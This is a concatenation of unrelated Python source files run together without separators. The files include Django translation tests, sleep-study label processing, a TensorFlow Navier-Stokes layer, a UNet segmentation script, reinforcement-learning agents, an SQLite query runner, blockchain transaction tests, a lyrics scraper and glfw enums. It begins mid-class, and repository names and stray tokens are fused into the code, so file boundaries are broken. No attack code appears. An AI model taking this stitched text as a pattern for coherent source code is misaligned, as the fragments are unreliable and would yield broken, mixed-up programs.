TestMultilingualForm(LinguoTests): def testCreatesModelInstanceWithAllFieldValues(self): translation.activate('fr') form = MultilingualBarFormAllFields(data={ 'name': 'Bar', 'name_fr': 'French Bar', 'price': 12, 'quantity': 5, 'description': 'English description.', 'description_fr': 'French description.' 
}) instance = form.save() translation.activate('en') instance = Bar.objects.get(id=instance.id) # Refresh from db self.assertEqual(instance.name, 'Bar') self.assertEqual(instance.price, 12) self.assertEqual(instance.quantity, 5) self.assertEqual(instance.description, 'English description.') translation.activate('fr') self.assertEqual(instance.name, 'French Bar') self.assertEqual(instance.price, 12) self.assertEqual(instance.quantity, 5) self.assertEqual(instance.description, 'French description.') def testUpdatesModelInstanceWithAllFieldValues(self): instance = Bar(name='Bar', price=12, quantity=5, description='Hello') instance.translate(language='fr', name='French Bar', description='French Hello') instance.save() translation.activate('fr') form = MultilingualBarFormAllFields(instance=instance, data={ 'name': 'Bar2', 'name_fr': 'French Bar2', 'price': 222, 'quantity': 55, 'description': 'Hello2', 'description_fr': 'French Hello2' }) instance = form.save() translation.activate('en') instance = Bar.objects.get(id=instance.id) # Refresh from db self.assertEqual(instance.name, 'Bar2') self.assertEqual(instance.price, 222) self.assertEqual(instance.quantity, 55) self.assertEqual(instance.description, 'Hello2') translation.activate('fr') self.assertEqual(instance.name, 'French Bar2') self.assertEqual(instance.price, 222) self.assertEqual(instance.quantity, 55) self.assertEqual(instance.description, 'French Hello2') def testInitialDataContainsAllFieldValues(self): instance = Bar(name='Bar', price=12, quantity=5, description='Hello') instance.translate(language='fr', name='French Bar', description='French Hello') instance.save() translation.activate('fr') form = MultilingualBarFormAllFields(instance=instance) self.assertEqual(form.initial['name'], 'Bar') self.assertEqual(form.initial['name_fr'], 'French Bar') self.assertEqual(form.initial['price'], 12) self.assertEqual(form.initial['quantity'], 5) self.assertEqual(form.initial['description'], 'Hello') self.assertEqual(form.initial['description_fr'], 'French Hello') class TestsForUnupportedFeatures(object): # LinguoTests): def testTransFieldHasNotNullConstraint(self): """ Test a trans model with a trans field that has a not null constraint. """ pass def testExtendingToMakeTranslatable(self): """ Test the ability to extend a non-translatable model with MultilingualModel in order to make some field translatable. """ pass def testSubclassingAbstractModelIntoTranslatableModel(self): """ Test the ability to subclass a a non-translatable Abstract model and extend with MultilingualModel in order to make some field translatable. 
""" pass def testModelFormWithFieldsExcluded(self): form = BarFormWithFieldsExcluded() self.assertEqual(len(form.fields), 4) self.assertTrue('price' in form.fields) self.assertTrue('quantity' in form.fields) self.assertTrue('description' in form.fields) self.assertTrue('description_fr' in form.fields) def testAdminChangelistFeaturesInSecondaryLanguage(self): # Create some Bar objects b1 = Bar.objects.create(name="apple", price=2, description="hello world", quantity=1) b1.translate(name="pomme", description="allo monde", language="fr") b1.save() b2 = Bar.objects.create(name="computer", price=3, description="oh my god", quantity=3) b2.translate(name="ordinator", description="oh mon dieu", language="fr") b2.save() translation.activate('fr') url = reverse('admin:tests_bar_changelist') response = self.client.get(url) # Check that the correct language is being displayed self.assertContains(response, 'allo monde') self.assertContains(response, 'oh mon dieu') self.assertNotContains(response, 'hello world') self.assertNotContains(response, 'oh my god') # Check the list filters self.assertContains(response, '?name=pomme') self.assertContains(response, '?name=ordinator') # Check that the filtering works response = self.client.get(url, {'name': 'ordinator'}) self.assertContains(response, 'oh mon dieu') self.assertNotContains(response, 'allo monde') # Check the searching response = self.client.get(url, {'q': 'monde'}) self.assertContains(response, 'allo monde') self.assertNotContains(response, 'oh mon dieu') default_app_config = 'polyline.apps.PolylineConfig'applewatch_dataprocessing/source/preprocessing/psg/psg_label_service.py import numpy as np import pandas as pd from source.constants import Constants from source.preprocessing.psg.psg_service import PSGService class PSGLabelService(object): @staticmethod def load(subject_id): psg_label_path = PSGLabelService.get_path(subject_id) feature = pd.read_csv(str(psg_label_path)).values return feature @staticmethod def get_path(subject_id): return Constants.FEATURE_FILE_PATH.joinpath(subject_id + '_psg_labels.out') @staticmethod def build(subject_id, valid_epochs): psg_array = PSGService.load_cropped_array(subject_id) labels = [] idx = psg_array[:, 0] original_labels = [] for epoch in valid_epochs: value = np.interp(epoch.timestamp, psg_array[:, 0], psg_array[:, 1]) labels.append(value) original_labels.append(psg_array[:, 1][[np.where(idx == epoch.timestamp)[0]]][0]) assert np.abs(np.asarray(labels)-np.asarray(original_labels)).sum() == 0, \ print("Label interpolation error") return np.array(labels) @staticmethod def write(subject_id, labels): psg_labels_path = PSGLabelService.get_path(subject_id) np.savetxt(psg_labels_path, labels, fmt='%f') import tensorflow as tf class GradientLayer(tf.keras.layers.Layer): """ Custom layer to compute derivatives for the steady Navier-Stokes equation. Attributes: model: keras network model. """ def __init__(self, model, **kwargs): """ Args: model: keras network model. """ self.model = model super().__init__(**kwargs) def call(self, xy): """ Computing derivatives for the steady Navier-Stokes equation. Args: xy: input variable. Returns: psi: stream function. p_grads: pressure and its gradients. u_grads: u and its gradients. v_grads: v and its gradients. 
""" x, y = [ xy[..., i, tf.newaxis] for i in range(xy.shape[-1]) ] with tf.GradientTape(persistent=True) as ggg: ggg.watch(x) ggg.watch(y) with tf.GradientTape(persistent=True) as gg: gg.watch(x) gg.watch(y) with tf.GradientTape(persistent=True) as g: g.watch(x) g.watch(y) psi_p = self.model(tf.concat([x, y], axis=-1)) psi = psi_p[..., 0, tf.newaxis] p = psi_p[..., 1, tf.newaxis] u = g.batch_jacobian(psi, y)[..., 0] v = -g.batch_jacobian(psi, x)[..., 0] p_x = g.batch_jacobian(p, x)[..., 0] p_y = g.batch_jacobian(p, y)[..., 0] del g u_x = gg.batch_jacobian(u, x)[..., 0] u_y = gg.batch_jacobian(u, y)[..., 0] v_x = gg.batch_jacobian(v, x)[..., 0] v_y = gg.batch_jacobian(v, y)[..., 0] del gg u_xx = ggg.batch_jacobian(u_x, x)[..., 0] u_yy = ggg.batch_jacobian(u_y, y)[..., 0] v_xx = ggg.batch_jacobian(v_x, x)[..., 0] v_yy = ggg.batch_jacobian(v_y, y)[..., 0] del ggg p_grads = p, p_x, p_y u_grads = u, u_x, u_y, u_xx, u_yy v_grads = v, v_x, v_y, v_xx, v_yy return psi, p_grads, u_grads, v_grads import os import datetime import argparse import torch from model import UNet from dataset import EvalDataset import utils from utils_time import TimeEstimator if __name__ == '__main__': ## Parse arguments parser = argparse.ArgumentParser() parser.add_argument('--pretrained_weights', type=str, default='pretrained/unet_epoch20.pth', help='path to pretrained model weights') parser.add_argument('--input_image_dir', type=str, default='eval/images', help='directory containing images to segment') parser.add_argument('--output_label_dir', type=str, default='eval/labels', help='directory to save segments') parser.add_argument('--num_workers', type=int, default=4, help='(only for gpu) number of cpu workers for DataLoader') opt = parser.parse_args() ## initialize os.makedirs(opt.output_label_dir, exist_ok=True) use_cuda = torch.cuda.is_available() if use_cuda: device = torch.device('cuda') else: device = torch.device('cpu') opt.num_workers = 0 print("Device: {}".format(device)) ## --------------------------------------------------------------------------- ## load model net = UNet() pretrained_dict = torch.load(opt.pretrained_weights, map_location=device) net.load_state_dict(pretrained_dict) net = net.to(device) ## load data evalset = EvalDataset(opt.input_image_dir) evalloader = torch.utils.data.DataLoader(evalset, num_workers=opt.num_workers, pin_memory=use_cuda) print("Number of evaluation images: {}".format(len(evalloader))) timeEstimator = TimeEstimator(len(evalloader)) ## --------------------------------------------------------------------------- ## === evaluate === net.eval() for batch_i, (image, name) in enumerate(evalloader): image = image.to(device) with torch.no_grad(): out = net(image) label = out.argmax(1) ## save label as image ## TODO: save label in original dimensions as palettised png, or other convenient form label = label[0].cpu().numpy() label_img = utils.label_to_image(label) filename = os.path.join(opt.output_label_dir, name[0]+'.png') utils.save_image(filename, label_img) delta_t, remaining_t = timeEstimator.update() print("EVAL | Batch {}/{} | {:.2f} sec | {} remaining".format( batch_i+1, len(evalloader), delta_t, datetime.timedelta(seconds=remaining_t) )) total_t = timeEstimator.total() print("Total Elapsed Time: {}".format(datetime.timedelta(seconds=total_t))) ilvar/lotien0 # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('content', '0002_auto_20150406_0221'), ] operations = [ 
migrations.AddField( model_name='sliderimage', name='title', field=models.CharField(max_length=255, null=True, verbose_name='\u041f\u043e\u0434\u043f\u0438\u0441\u044c'), ), ] import click import os from click_repl import repl from prompt_toolkit.history import FileHistory from ..utils.logging import logger from ..utils.exceptions import handle_exceptions @click.command() def main(): ''' Start an interactive shell. All commands and subcommands are available in it. If stdin is not a TTY, no prompt will be printed, but only commands read from stdin. ''' prompt_kwargs = { 'history': FileHistory(os.path.expanduser('~/.termicoder-history')), } repl(click.get_current_context(), prompt_kwargs=prompt_kwargs) #!/usr/bin/env python # -*- coding: utf-8 -*- # # SARSA(λ) agent import numpy as np from gym_trainer.helpers.utils import epsilon_greedy, get_decayed_param class TableSarsaLambdaAgent: def __init__(self, dim_obs, dim_action, obs_min, obs_max, n_disc, lr=0.1, gamma=0.99, eps_ini=0.8, eps_inf=0.1, eps_decay_rate=0.99, _lambda=0.7): """ Args: dim_obs (int): dimension of observation dim_action (int): dimension of action obs_min (list): list of min value for each dimension obs_max (list): list of max value for each dimension n_disc (int): number of discretization lr (float): learning rate gamma (float): discount factor eps_ini (float): initial epsilon value eps_inf (float): stationary epsilon value eps_decay_rate (float): decay rate for epsilon value _lambda (float): parameter for calculating λ-return """ self.dim_obs = dim_obs self.dim_action = dim_action assert len(obs_min) == dim_obs assert len(obs_max) == dim_obs self.obs_min = obs_min self.obs_max = obs_max self.n_disc = n_disc self.lr = lr self.gamma = gamma assert eps_ini + eps_inf <= 1.0 self.eps_ini = eps_ini self.eps_inf = eps_inf self.eps_decay_rate = eps_decay_rate self._lambda = _lambda self.q = np.zeros(((2 * n_disc) ** dim_obs, dim_action)) self.e = np.zeros(((2 * n_disc) ** dim_obs, dim_action)) # eligibility trace def reset(self, observation, i_episode): self.e = np.zeros(((2*self.n_disc)**self.dim_obs, self.dim_action)) state = self.get_state(observation) action = self.get_action(state, i_episode) return action def step(self, obs, action, obs_next, reward, i_episode): """agent step when training Args: obs: previous observation action: action agent took given obs obs_next: next observation agent got reward: reward agent got i_episode (int): index of episode Returns: """ state = self.get_state(obs) state_next = self.get_state(obs_next) action_next = self.get_action(state_next, i_episode) delta = reward + self.gamma * self.q[state_next, action_next] - self.q[state, action] self.e[state, action] += 1 for i in range(self.n_disc**self.dim_obs): for j in range(self.dim_action): self.q[i, j] += self.lr * delta * self.e[i, j] self.e[i, j] = self.gamma * self._lambda * self.e[i, j] return action_next def step_inference(self, obs): state = self.get_state(obs) action = self.get_action_inference(state) return action def get_action(self, state, i_episode): # follow ε-greedy policy eps = get_decayed_param(self.eps_ini, self.eps_inf, self.eps_decay_rate, i_episode) action = epsilon_greedy(eps, list(self.q[state, :])) return action def get_action_inference(self, state): action = np.argmax(self.q[state, :]) return action 1-10 import ntpath import sqlite3 import sys import time from datetime import datetime from pathlib import Path from sqlite3 import Error from logzero import logger class Database(object): def __init__(self, dbfiles, disabled, 
scan_datetime, expiration_days): # Create array of file path(s) to database file(s) self._dbfiles = [] for dbfile in dbfiles: self._dbfiles.append(Path(dbfile)) self._expirationDays = str(expiration_days) self._disabledSqlQuery = "0" if disabled is False: self._disabledSqlQuery = "1" self._flagScanDateTime = scan_datetime['override'] self._progressIndex = 0 self._metricName = None # Set the value below to increase performance for larger data sets # Note: This is the amount of SQLite VMs per progress report - NOT RESULTS! self._progressIncrement = 100000 # Parse scan date & time if no override detected self._scanDateTime = [] i = 0 if not self._flagScanDateTime: for dbfile in self._dbfiles: # Split to arrays dbFileName = ntpath.basename(dbfile) dbFileNameSplit = dbFileName.split("_") dnaIndex = dbFileNameSplit.index("DNA") dIndex = dnaIndex + 1 tIndex = dIndex + 1 dbFileTimeSplit = dbFileNameSplit[tIndex].split(".") try: # Format as proper datetime value inScanTime = datetime.strptime(dbFileTimeSplit[0].replace("-", " "), "%I %M %S %p") except ValueError: print("DNAmic Analysis does not support 24-hour format in DNA database filenames:", dbFileTimeSplit[0]) print("FIX: Either change the filename to 12-hour format or change your config YAML to override scan datetime.") print("--------------------------") raise # Strip 1900-01-01 placemarker date and format to 24-hour scanTime = datetime.strftime(inScanTime, "%H:%M:%S") # Combine datetime for SQL query self._scanDateTime.append(dbFileNameSplit[dIndex] + " " + scanTime) logger.info("Parsed scan datetime from database filename: {}".format(self._scanDateTime[i])) i = i + 1 else: for dbfile in self._dbfiles: self._scanDateTime.append(scan_datetime['manual_scan_datetime']) logger.info("Manual override detected, received scan datetime as: {}".format(self._scanDateTime[i])) i = i + 1 def progress_handler(self): """ Handles progress animation during SQLite database queries """ self._progressIndex += 1 print("{} Processing... 
[{}]".format(self._metricName, self._progressIndex), end="\r", flush=True) def create_connection(self, dbfile): """ Create a database connection to the SQLite database """ try: conn = sqlite3.connect(dbfile) logger.info("Successfully connected to SQLite3 database at {}".format(dbfile)) return conn except Error as e: logger.exception(e) return None def exec_fromfile(self, sqlfile, metric_name, regex_flag=False, regex_array=None): """ Executes the query from a SQL file and returns all rows """ # Open and read the SQL file as a single buffer try: with open(sqlfile, 'r') as file: sqlQuery = file.read() logger.info("Opened & read {}".format(sqlfile)) except Exception as e: logger.exception(e) ################################################################ # BEGIN FOR LOOP ON SQLITE CONNECTIONS ################################################################ i = 0 all_fetched_rows = [] for dbfile in self._dbfiles: # Create database connection try: conn = self.create_connection(dbfile) self._metricName = metric_name conn.set_progress_handler(self.progress_handler, self._progressIncrement) # Create a cursor for the database connection c = conn.cursor() logger.info("Created database connection cursor") except Error as e: logger.exception(e) try: # Make replacement in SQL query sqlQueryDT = sqlQuery.replace("{scanDateTime}", self._scanDateTime[i]) sqlQueryExpire = sqlQueryDT.replace("{expirationDays}", self._expirationDays) # Replace disabled section of SQL query sqlQueryFinal = sqlQueryExpire.replace("{disabled}", self._disabledSqlQuery) except Exception as e: logger.exception(e) # Execute the SQL query logger.info("Starting query execution and analysis.") if regex_flag: try: whereStmt = "" counter = 0 for regex in regex_array: if counter == 0: whereStmt += "Accounts.Name LIKE '{}' ".format(regex.replace('^','%')) else: whereStmt += "OR Accounts.Name LIKE '{}' ".format(regex.replace('^','%')) counter += 1 c.execute(sqlQueryFinal.replace("{whereStmt}", whereStmt)) logger.info("Executed {} on SQLite3 database successfully".format(sqlQueryFinal.replace("{whereStmt}", whereStmt))) except Error as e: logger.exception(e) else: # Execute the SQL query try: c.execute(sqlQueryFinal) logger.info("Executed {} on SQLite3 database successfully".format(sqlQueryFinal)) except Error as e: logger.exception(e) # Fetch all rows returned from SQL query try: current_fetched_rows = c.fetchall() row_count = len(current_fetched_rows) if row_count > 0: all_fetched_rows = all_fetched_rows + current_fetched_rows logger.info("Fetched {} rows".format(row_count)) except Error as e: logger.exception(e) finally: print("\nFinished processing {} on {} finding {} row(s).".format(self._metricName, dbfile, row_count), flush=True) self._progressIndex = 0 conn.close() i = i + 1 ################################################################ # END FOR LOOP ON SQLITE CONNECTIONS ################################################################ # Return all rows returned from SQL query return all_fetched_rows # MIT License # # Copyright (c) 2021 and and # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this 
permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from dataclasses import dataclass, field from openspeech.dataclass.configurations import OpenspeechDataclass @dataclass class Jasper10x5Config(OpenspeechDataclass): r""" This is the configuration class to store the configuration of a :class:`~openspeech.models.Jasper10x5`. It is used to initiated an `Jasper10x5` model. Configuration objects inherit from :class: `~openspeech.dataclass.configs.OpenspeechDataclass`. Configurations: model_name (str): Model name (default: jasper10x5) num_blocks (int): Number of jasper blocks (default: 10) num_sub_blocks (int): Number of jasper sub blocks (default: 5) in_channels (str): Output channels of jasper block's convolution out_channels (str): Output channels of jasper block's convolution kernel_size (str): Kernel size of jasper block's convolution dilation (str): Dilation of jasper block's convolution dropout_p (str): Dropout probability optimizer (str): Optimizer for training. """ model_name: str = field( default="jasper10x5", metadata={"help": "Model name"} ) num_blocks: int = field( default=10, metadata={"help": "Number of jasper blocks"} ) num_sub_blocks: int = field( default=5, metadata={"help": "Number of jasper sub blocks"} ) in_channels: str = field( default="(None, 256, 256, 256, 384, 384, 512, 512, 640, 640, 768, 768, 896, 1024)", metadata={"help": "Input channels of jasper blocks"} ) out_channels: str = field( default="(256, 256, 256, 384, 384, 512, 512, 640, 640, 768, 768, 768, 896, 1024, None)", metadata={"help": "Output channels of jasper block's convolution"} ) kernel_size: str = field( default="(11, 11, 11, 13, 13, 17, 17, 21, 21, 25, 25, 29, 1, 1)", metadata={"help": "Kernel size of jasper block's convolution"} ) dilation: str = field( default="(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1)", metadata={"help": "Dilation of jasper block's convolution"} ) dropout_p: str = field( default="(0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.3, 0.3, 0.3, 0.3, 0.4, 0.4, 0.0)", metadata={"help": "Dropout probability"} ) optimizer: str = field( default="novograd", metadata={"help": "Optimizer for training."} ) # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-04-15 16:18 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [("meupet", "0033_remove_status_field")] operations = [migrations.RenameField(model_name="pet", old_name="new_status", new_name="status")] from django.db import models from django.utils import timezone from .management import dummymodel from .user import User class Todo(models.Model): assignee = models.ForeignKey('Person', on_delete=models.CASCADE, related_name='todos') id = models.AutoField(primary_key=True) title = models.CharField(max_length=255) description = models.CharField(max_length=1024, null=True) due_date = models.DateField(null=True, default=timezone.now) done = models.BooleanField(null=True) class Comment(models.Model): READ = 1 UNREAD = 2 STATUS_CHOICES = [ (READ, 'READ'), (UNREAD, 
'UNREAD') ] todo = models.ForeignKey('Todo', on_delete=models.CASCADE, related_name='comments') id = models.AutoField(primary_key=True) message = models.CharField(max_length=512, null=True) submitted = models.DateField(null=True, default=timezone.now) status = models.IntegerField(choices=STATUS_CHOICES, null=True) class Person(models.Model): id = models.AutoField(primary_key=True) email = models.CharField(max_length=100, null=True) firstname = models.CharField(max_length=100, null=True) lastname = models.CharField(max_length=100, null=True) last_login = models.DateField(null=True, default=timezone.now) sphinx_markdown/nodes.py import os from docutils import nodes import markdown from sphinx_markdown.extensions.images import StaticImagesExtension class MarkdownNode(nodes.raw, nodes.Element): """HTML container for markdown contents """ filename = '' htmlcontent = '' extensions = [] def load_markdown(self): """Save the markdown contents to this node """ with open(self.filename) as handle: handle.readline() text = unicode(handle.read().decode('utf-8')) static_dir = os.path.relpath('_static', start=os.path.dirname(self.filename)) sphinx_md_ext = StaticImagesExtension(static_dir=static_dir) extensions = [sphinx_md_ext]+self.extensions self.htmlcontent = markdown.markdown(text, extensions=extensions) def astext(self): return self.htmlcontent def visit_markdown_node(document, node): document.body.append(node.htmlcontent) def depart_markdown_node(document_, node_): pass from rlberry.utils.jit_setup import numba_jit @numba_jit def bounds_contains(bounds, x): """ Returns True if `x` is contained in the bounds, and False otherwise. Parameters ---------- bounds : numpy.ndarray Array of shape (d, 2). Bounds of each dimension [ [x0, y0], [x1, y1], ..., [xd, yd] ], representing the following cartesian product in R^d: [x0, y0] X [x1, y1] X ... X [xd, yd]. x : numpy.ndarray Array of shape (d,) """ dim = x.shape[0] for dd in range(dim): if x[dd] < bounds[dd, 0] or x[dd] > bounds[dd, 1]: return False return True def split_bounds(bounds, dim=0): """ Split an array representing an l-infinity ball in R^d in R^d into a list of 2^d arrays representing the ball split. Parameters ---------- bounds : numpy.ndarray Array of shape (d, 2). Bounds of each dimension [ [x0, y0], [x1, y1], ..., [xd, yd] ], representing the cartesian product in R^d: [x0, y0] X [x1, y1] X ... X [xd, yd]. dim : int, default: 0 Dimension from which to start splitting. Returns ------- List of arrays of shape (d, 2) containing the bounds to be split. 
""" if dim == bounds.shape[0]: return [bounds] left = bounds[dim, 0] right = bounds[dim, 1] middle = (left+right)/2.0 left_interval = bounds.copy() right_interval = bounds.copy() left_interval[dim, 0] = left left_interval[dim, 1] = middle right_interval[dim, 0] = middle right_interval[dim, 1] = right return split_bounds(left_interval, dim+1) + split_bounds(right_interval, dim+1) ltonetwork/lto-api.python from LTO.Accounts.AccountFactoryED25519 import AccountED25519 as AccountFactory from LTO.Transactions.Association import Association from unittest import mock from time import time class TestAssociation: ACCOUNT_SEED = "" account = AccountFactory('T').createFromSeed(ACCOUNT_SEED) def testContruct(self): transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1) assert transaction.txFee == 100000000 assert transaction.associationType == 1 assert transaction.recipient == '3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1' def testSignWith(self): transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1) assert transaction.isSigned() is False transaction.signWith(self.account) assert transaction.isSigned() is True timestamp = int(time() * 1000) assert str(transaction.timestamp)[:-3] == str(timestamp)[:-3] assert transaction.sender == '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2' assert transaction.senderPublicKey == '' assert self.account.verifySignature(transaction.toBinary(), transaction.proofs[0]) def expectedV1(self): return({'associationType': 1, 'fee': 100000000, 'hash': 'HiorsQW6E76Cp4AD51zcKcWu644ZzzraXQL286Jjzufh7U7qJroTKt7KMMpv', 'proofs': [''], 'recipient': '', 'sender': '', 'senderPublicKey': '', 'timestamp': 1629883934685, 'type': 16, 'version': 1}) def expectedV3(self): return({ "type": 16, "version": 3, "sender": "", "senderKeyType": "ed25519", "senderPublicKey": '', "recipient": '', "associationType": 1, "hash": 'HiorsQW6E76Cp4AD51zcKcWu644ZzzraXQL286Jjzufh7U7qJroTKt7KMMpv', "timestamp": 1629883934685, "expires": 1841961856000, "fee": 100000000, "proofs": [''], }) def testToJson(self): transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1, anchor='', expires= 1841961856000) #transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1, anchor='', expires=1841961856000) transaction.timestamp = 1629883934685 transaction.signWith(self.account) if transaction.version == 1: expected = self.expectedV1() elif transaction.version == 3: expected = self.expectedV3() else: expected = '' assert transaction.toJson() == expected @mock.patch('src.LTO.PublicNode') def testBroadcast(self, mock_Class): transaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1, anchor='') broadcastedTransaction = Association('3N3Cn2pYtqzj7N9pviSesNe8KG9Cmb718Y1', 1, anchor='') broadcastedTransaction.id = '7cCeL1qwd9i6u8NgMNsQjBPxVhrME2BbfZMT1DF9p4Yi' mc = mock_Class.return_value mc.broadcast.return_value = broadcastedTransaction assert mc.broadcast(transaction) == broadcastedTransaction def testFromData(self): data = { "type": 16, "version": 3, "recipient": "3N9ChkxWXqgdWLLErWFrSwjqARB6NtYsvZh", "associationType": 1, "hash": "3yMApqCuCjXDWPrbjfR5mjCPTHqFG8Pux1TxQrEM35jj", "id": "1uZqDjRjaehEceSxrVxz6WD6wt8su8TBHyDLQ1KFnJo", "sender": "3NBcx7AQqDopBj3WfwCVARNYuZyt1L9xEVM", "senderPublicKey": "", "timestamp": 1610404930000, "expires": 1841961856000, "fee": 100000000, "proofs": [ "" ], "height": 1225712 } transaction = Association(recipient='', associationType='').fromData(data) for key in data: assert data[key] == transaction.__getattr__(key) libbyh/jekyll-now-demo import billboard import 
json import urllib from urllib.parse import quote apikey = 'APIKEY' # make the empty dictionary songs = {} # loop through the years we're interested in for x in range(1960, 2016): # another dictionary inside songs[x] = {} # get the chart for the last week of that year chart = billboard.ChartData('hot-100', '%s-12-19' % str(x)) # for every song on the chart, keep its rank, title, and author for song in chart: songs[x][song.rank] = {} songs[x][song.rank]['rank'] = song.rank songs[x][song.rank]['title'] = song.title songs[x][song.rank]['artist'] = song.artist # look up the song in musixmatch api_url = "http://api.musixmatch.com/ws/1.1/matcher.track.get?apikey=%s&q_artist=%s&q_track=%s" % (apikey, quote(song.artist, safe=''), quote(song.title, safe='')) url = urllib.request.urlopen(api_url).read().decode('UTF-8') result = json.loads(url) songs[x][song.rank]['musixmatch'] = result # use lyrics id to get lyrics info and store that instead of all the junk from musixmatch api_url_lyrics = "http://api.musixmatch.com/ws/1.1/matcher.lyrics.get?apikey=%s&q_track=%s&q_artist=%s" % (apikey, quote(song.title, safe=''), quote(song.artist, safe='')) url_lyrics = urllib.request.urlopen(api_url_lyrics).read().decode('UTF-8') lyrics = json.loads(url_lyrics) #checks against any songs not in MusixMatch database and any songs without lyrics if result['message']['header']['status_code'] != 404 and result['message']['body']['track']['has_lyrics'] == 1: lyrics_id = result['message']['body']['track']['lyrics_id'] get_lyrics = lyrics['message']['body']['lyrics']['lyrics_body'] songs[x][song.rank]['lyrics'] = get_lyrics #dump all the data to a json file (readable output) with open('song-data.json', 'w') as out_file: for x in sorted(songs): out_file.write('>') json.dump(x, out_file) out_file.write('\n') for y in songs[x]: if 'lyrics' in songs[x][y]: out_file.write('(') json.dump(y, out_file) out_file.write(') ' + songs[x][y]['title'] + ' - ' + songs[x][y]['artist']) out_file.write('\n') json.dump(songs[x][y]['lyrics'].replace('\n', ' '), out_file) out_file.write('\n') out_file.write('\n') rest_framework_docs/views.py from django.http import Http404 from django.views.generic.base import TemplateView from rest_framework_docs.api_docs import ApiDocumentation from rest_framework_docs.settings import DRFSettings class DRFDocsView(TemplateView): template_name = "rest_framework_docs/home.html" drf_router = None def get_context_data(self, filter_param=None, **kwargs): settings = DRFSettings().settings if settings["HIDE_DOCS"]: raise Http404("Django Rest Framework Docs are hidden. 
Check your settings.") context = super(DRFDocsView, self).get_context_data(**kwargs) docs = ApiDocumentation(drf_router=self.drf_router, filter_param=filter_param) endpoints = docs.get_endpoints() query = self.request.GET.get("search", "") if query and endpoints: endpoints = [endpoint for endpoint in endpoints if query in endpoint.path] context['query'] = query context['endpoints'] = endpoints return context 1-10 import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torch.autograd import Variable class DQN(nn.Module): def __init__(self, number_actions): super(DQN, self).__init__() self.convolution1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5) self.convolution2 = nn.Conv2d(in_channels=32, out_channels=32, kernel_size=3) self.convolution3 = nn.Conv2d(in_channels=32, out_channels=32, kernel_size=3) self.convolution4 = nn.Conv2d(in_channels=32, out_channels=32, kernel_size=2) self.fc1 = nn.Linear(in_features=self.count_neurons((1, 320, 240)), out_features=40) self.fc2 = nn.Linear(in_features=40, out_features=40) self.fc3 = nn.Linear(in_features=40, out_features=number_actions) def count_neurons(self, image_dim): x = Variable(torch.rand(1, *image_dim)) x = F.relu(F.max_pool2d(self.convolution1(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution2(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution3(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution4(x), 3, 2)) return x.data.view(1, -1).size(1) def forward(self, x): x = F.relu(F.max_pool2d(self.convolution1(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution2(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution3(x), 3, 2)) x = F.relu(F.max_pool2d(self.convolution4(x), 3, 2)) x = x.view(x.size(0), -1) x = F.relu(self.fc1(x)) x = self.fc2(x) x = self.fc3(x) return xfrom __future__ import annotations from enum import IntEnum, IntFlag import glfw class MouseButton(IntFlag): NONE = 0 Left = 1 << 1 Middle = 1 << 2 Right = 1 << 3 @classmethod def from_glfw_mouse_btn_code(cls, btn_code): return _MOUSE_MAP[btn_code] class KeyModifier(IntFlag): NONE = 0 Shift = 1 << 0 Ctrl = 1 << 1 Alt = 1 << 2 Super = 1 << 5 @classmethod def from_glfw_modifiers(cls, mods): modifiers = cls.NONE if mods & glfw.MOD_SHIFT: modifiers |= cls.Shift if mods & glfw.MOD_CONTROL: modifiers |= cls.Ctrl if mods & glfw.MOD_ALT: modifiers |= cls.Alt if mods & glfw.MOD_SUPER: modifiers |= cls.Super return modifiers class KeyCode(IntEnum): Space = 32 Apostrophe = 39 # ' Comma = 44 # , Minus = 45 # - Period = 46 # . 
